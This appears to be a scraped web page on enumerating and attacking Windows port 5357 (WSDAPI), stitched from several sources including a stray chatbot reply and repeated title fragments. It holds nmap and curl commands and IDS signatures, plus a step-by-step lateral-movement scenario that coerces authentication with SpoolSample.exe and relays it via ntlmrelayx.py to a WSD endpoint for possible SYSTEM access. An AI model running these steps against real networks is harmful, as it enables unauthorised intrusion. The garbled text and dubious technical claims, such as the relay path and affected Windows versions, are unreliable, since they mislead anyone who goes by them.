Port 5357: WSDAPI Enumeration and Penetration Testing Port 5357 (TCP) is primarily used by the Web Services for Devices API (WSDAPI), Microsoft's implementation of the WS-Discovery protocol. It allows Windows systems to automatically discover and communicate with network-connected devices like printers, scanners, and file shares over HTTP. In a penetration testing context, this port is often a target for fingerprinting Windows environments or exploiting legacy memory corruption vulnerabilities. Service Overview
WSDAPI facilitates a "plug-and-play" network experience. It typically utilizes: TCP Port 5357: HTTP-based communication. TCP Port 5358: HTTPS-based communication (secure channel). UDP Port 3702: Multicast discovery (WS-Discovery).
The service is generally active on Windows Vista, Windows 7, Windows 10, and Windows Server 2008 and later. Enumeration and Information Gathering
During a network assessment, port 5357 is highly useful for fingerprinting the target system. 1. Nmap Scanning
You can use Nmap to identify the service and its version. Since it runs over HTTP, standard service discovery flags are effective: nmap -p 5357 -sV Use code with caution.
Nmap typically identifies this as http or microsoft-httpapi. If the port appears open on every host in a subnet, it may be due to network-level forwarding or a firewall configuration rather than the service actually being active on every individual host. 2. Service Metadata port 5357 hacktricks
WSDAPI can leak significant metadata that aids in lateral movement: Hostnames and computer names. Device metadata such as printer models or scanner types. Network paths and file share locations. Known Vulnerabilities and Exploitation MS09-063: Memory Corruption (CVE-2009-2512)
One of the most critical vulnerabilities associated with WSDAPI is a stack-based buffer overflow.
Port 5357 – WSDAPI (Web Services for Devices) - PentestPad
I notice you're asking about "port 5357 hacktricks" — this likely refers to port 5357 and its potential relevance in penetration testing or security research, possibly documented on the HackTricks platform.
Here’s what I can tell you:
curl http://<target>:5357/
Port 5357 is officially allocated to WSDAPI – Web Services for Devices on Windows. It is part of Microsoft’s implementation of the Devices Profile for Web Services (DPWS). Think of it as a "Plug and Play for the network" – devices (printers, scanners, media servers, IoT hubs) announce themselves and their capabilities via SOAP/HTTP.
By default, Windows 10/11, Server 2016/2019/2022 listen on 0.0.0.0:5357 when network discovery is enabled (turned on in "Network and Sharing Center").
Older Windows versions (7, Server 2008 R2, early 2016) had a RCE via crafted ProbeMatches message. Exploit code exists on Exploit-DB.
Do not run intrusive exploitation against systems you don’t own or have permission to test. Port 5357: WSDAPI Enumeration and Penetration Testing Port
# Check if open
nmap -p 5357 <target>
Example detection signatures (IDS/Suricata/snort)
- HTTP requests to port 5357 containing SOAP actions like GetDeviceInformation or GetServices.
- Large or malformed SOAP envelopes to :5357 (possible fuzzing/exploit attempts).
- Unexpected POSTs to /Device or /wsd endpoints from unusual hosts.
Scenario: Internal Compromise
You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open.
Step 1: Coerce Authentication
Using SpoolSample.exe:
SpoolSample.exe TARGET-50 AttackerPC
This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.
Step 2: Relay to WSD
ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support
If successful, you might get device control or even SYSTEM. Banner/info retrieval:
Step 3: Command Injection via WSD Action
Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).